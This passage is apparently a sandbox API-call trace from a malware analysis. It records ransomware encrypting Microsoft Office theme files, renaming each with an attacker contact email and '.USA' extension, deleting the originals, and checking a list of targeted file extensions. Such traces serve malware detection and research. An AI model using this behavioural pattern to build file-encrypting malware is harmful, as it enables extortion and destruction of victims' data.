Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.881] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.881] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.882] GetLastError () returned 0x0 [0270.882] ReadFile (in: hFile=0x384, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x5e35, lpOverlapped=0x0) returned 1 [0270.892] WriteFile (in: hFile=0x328, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x5e40, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x5e40, lpOverlapped=0x0) returned 1 [0270.893] ReadFile (in: hFile=0x384, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.893] WriteFile (in: hFile=0x328, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0270.893] SetEndOfFile (hFile=0x328) returned 1 [0270.893] CloseHandle (hObject=0x328) returned 1 [0270.893] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.893] SetEndOfFile (hFile=0x384) returned 1 [0270.896] CloseHandle (hObject=0x384) returned 1 [0270.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.897] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx")) returned 1 [0270.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.897] lstrlenW (lpString=".doc") returned 4 [0270.897] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.897] lstrlenW (lpString=".docx") returned 5 [0270.897] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.897] lstrlenW (lpString=".pdf") returned 4 [0270.897] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.897] lstrlenW (lpString=".xls") returned 4 [0270.897] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.897] lstrlenW (lpString=".xlsx") returned 5 [0270.897] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.897] lstrlenW (lpString=".ppt") returned 4 [0270.897] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.897] lstrlenW (lpString=".zip") returned 4 [0270.898] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.898] lstrlenW (lpString=".rar") returned 4 [0270.898] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.898] lstrlenW (lpString=".bz2") returned 4 [0270.898] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.898] lstrlenW (lpString=".7z") returned 3 [0270.898] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.898] lstrlenW (lpString=".dbf") returned 4 [0270.898] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.898] lstrlenW (lpString=".1cd") returned 4 [0270.898] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.898] lstrlenW (lpString=".jpg") returned 4 [0270.898] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.898] lstrlenW (lpString=".doc") returned 4 [0270.898] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.898] lstrlenW (lpString=".docx") returned 5 [0270.898] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.898] lstrlenW (lpString=".pdf") returned 4 [0270.898] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.898] lstrlenW (lpString=".xls") returned 4 [0270.898] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.898] lstrlenW (lpString=".xlsx") returned 5 [0270.899] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.899] lstrlenW (lpString=".ppt") returned 4 [0270.899] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.899] lstrlenW (lpString=".zip") returned 4 [0270.899] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.899] lstrlenW (lpString=".rar") returned 4 [0270.899] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.899] lstrlenW (lpString=".bz2") returned 4 [0270.899] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.899] lstrlenW (lpString=".7z") returned 3 [0270.899] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.899] lstrlenW (lpString=".dbf") returned 4 [0270.899] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.899] lstrlenW (lpString=".1cd") returned 4 [0270.899] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0270.899] lstrlenW (lpString=".jpg") returned 4 [0270.899] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.899] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.900] lstrlenW (lpString="Module.eftx") returned 11 [0270.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.902] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=43357) returned 1 [0270.902] CloseHandle (hObject=0x3b0) returned 1 [0270.903] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx")) returned 0x20 [0270.903] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.903] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.903] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.904] GetLastError () returned 0x0 [0270.904] ReadFile (in: hFile=0x3b0, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0xa95d, lpOverlapped=0x0) returned 1 [0270.912] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xa960, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xa960, lpOverlapped=0x0) returned 1 [0270.913] ReadFile (in: hFile=0x3b0, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.913] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0270.913] SetEndOfFile (hFile=0x384) returned 1 [0270.913] CloseHandle (hObject=0x384) returned 1 [0270.913] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.913] SetEndOfFile (hFile=0x3b0) returned 1 [0270.916] CloseHandle (hObject=0x3b0) returned 1 [0270.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.916] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx")) returned 1 [0270.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.916] lstrlenW (lpString=".doc") returned 4 [0270.916] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.916] lstrlenW (lpString=".docx") returned 5 [0270.916] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.916] lstrlenW (lpString=".pdf") returned 4 [0270.916] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.916] lstrlenW (lpString=".xls") returned 4 [0270.916] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.917] lstrlenW (lpString=".xlsx") returned 5 [0270.917] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.917] lstrlenW (lpString=".ppt") returned 4 [0270.917] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.917] lstrlenW (lpString=".zip") returned 4 [0270.917] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.917] lstrlenW (lpString=".rar") returned 4 [0270.917] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.917] lstrlenW (lpString=".bz2") returned 4 [0270.917] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.917] lstrlenW (lpString=".7z") returned 3 [0270.917] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.917] lstrlenW (lpString=".dbf") returned 4 [0270.917] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.917] lstrlenW (lpString=".1cd") returned 4 [0270.917] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.917] lstrlenW (lpString=".jpg") returned 4 [0270.917] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.917] lstrlenW (lpString=".doc") returned 4 [0270.917] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.917] lstrlenW (lpString=".docx") returned 5 [0270.917] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.918] lstrlenW (lpString=".pdf") returned 4 [0270.918] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.918] lstrlenW (lpString=".xls") returned 4 [0270.918] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.918] lstrlenW (lpString=".xlsx") returned 5 [0270.918] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.918] lstrlenW (lpString=".ppt") returned 4 [0270.918] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.918] lstrlenW (lpString=".zip") returned 4 [0270.918] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.918] lstrlenW (lpString=".rar") returned 4 [0270.918] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.918] lstrlenW (lpString=".bz2") returned 4 [0270.918] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.918] lstrlenW (lpString=".7z") returned 3 [0270.918] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.918] lstrlenW (lpString=".dbf") returned 4 [0270.918] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.918] lstrlenW (lpString=".1cd") returned 4 [0270.918] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0270.918] lstrlenW (lpString=".jpg") returned 4 [0270.918] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.919] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.919] lstrlenW (lpString="Newsprint.eftx") returned 14 [0270.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.922] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=582401) returned 1 [0270.922] CloseHandle (hObject=0x388) returned 1 [0270.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx")) returned 0x20 [0270.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.923] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.923] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.973] GetLastError () returned 0x0 [0270.973] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x8e301, lpOverlapped=0x0) returned 1 [0271.026] WriteFile (in: hFile=0x3b0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x8e310, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x8e310, lpOverlapped=0x0) returned 1 [0271.036] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.036] WriteFile (in: hFile=0x3b0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0271.036] SetEndOfFile (hFile=0x3b0) returned 1 [0271.036] CloseHandle (hObject=0x3b0) returned 1 [0271.036] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.036] SetEndOfFile (hFile=0x388) returned 1 [0271.253] CloseHandle (hObject=0x388) returned 1 [0271.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx")) returned 1 [0271.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.298] lstrlenW (lpString=".doc") returned 4 [0271.298] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.298] lstrlenW (lpString=".docx") returned 5 [0271.298] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.298] lstrlenW (lpString=".pdf") returned 4 [0271.298] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.298] lstrlenW (lpString=".xls") returned 4 [0271.298] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.298] lstrlenW (lpString=".xlsx") returned 5 [0271.298] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.298] lstrlenW (lpString=".ppt") returned 4 [0271.298] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.298] lstrlenW (lpString=".zip") returned 4 [0271.298] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.298] lstrlenW (lpString=".rar") returned 4 [0271.298] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.298] lstrlenW (lpString=".bz2") returned 4 [0271.298] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.298] lstrlenW (lpString=".7z") returned 3 [0271.298] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.298] lstrlenW (lpString=".dbf") returned 4 [0271.298] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.299] lstrlenW (lpString=".1cd") returned 4 [0271.299] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.299] lstrlenW (lpString=".jpg") returned 4 [0271.299] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.299] lstrlenW (lpString=".doc") returned 4 [0271.299] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.299] lstrlenW (lpString=".docx") returned 5 [0271.299] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.299] lstrlenW (lpString=".pdf") returned 4 [0271.299] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.299] lstrlenW (lpString=".xls") returned 4 [0271.299] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.299] lstrlenW (lpString=".xlsx") returned 5 [0271.299] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.299] lstrlenW (lpString=".ppt") returned 4 [0271.299] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.299] lstrlenW (lpString=".zip") returned 4 [0271.299] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.299] lstrlenW (lpString=".rar") returned 4 [0271.299] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.299] lstrlenW (lpString=".bz2") returned 4 [0271.299] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.299] lstrlenW (lpString=".7z") returned 3 [0271.299] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.299] lstrlenW (lpString=".dbf") returned 4 [0271.300] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.300] lstrlenW (lpString=".1cd") returned 4 [0271.300] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0271.300] lstrlenW (lpString=".jpg") returned 4 [0271.300] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.300] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.300] lstrlenW (lpString="Pushpin.eftx") returned 12 [0271.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.458] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=782121) returned 1 [0271.458] CloseHandle (hObject=0x380) returned 1 [0271.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx")) returned 0x20 [0271.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0271.468] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.468] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | 